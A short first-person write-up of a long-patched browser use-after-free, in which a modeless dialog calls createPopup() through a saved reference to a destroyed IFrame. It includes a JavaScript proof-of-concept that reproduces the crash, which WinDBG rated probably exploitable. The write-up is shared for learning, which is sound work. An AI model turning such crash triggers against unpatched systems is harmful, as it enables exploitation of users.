By opening a modeless dialog from within an IFrame, saving a reference back to the IFrame's window, and then reloading the main window (which destroyed the IFrame), the modeless dialog could still call createPopup() on that reference, producing a popup tied to a dead IFrame context. Manually resizing that popup caused a crash that WinDBG classified as PROBABLY_EXPLOITABLE.

// Called from the modeless dialog after the main window reloads.
// iFrame is the reference to the IFrame's window that the dialog saved
// before the reload; by now the IFrame itself has been destroyed.
function openResizablePopUp() {
    // The .self indirection was required for this code path to reach the bug.
    var badPop = iFrame.self.createPopup();
    badPop.document.body.innerHTML = '<h1>Resize this window.</h1>';
    badPop.show(0, 0, 600, 200);
    // Now manually resize/move the popup to trigger the crash
}

The popup was created via iFrame.self.createPopup() — the self indirection was necessary for this specific code path to work. Once shown, the popup’s resize message handler tried to call back into the IFrame’s CDoc::OnWindowMessage, whose owning document had already been freed, causing the access violation. WinDBG classified it as PROBABLY_EXPLOITABLE.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.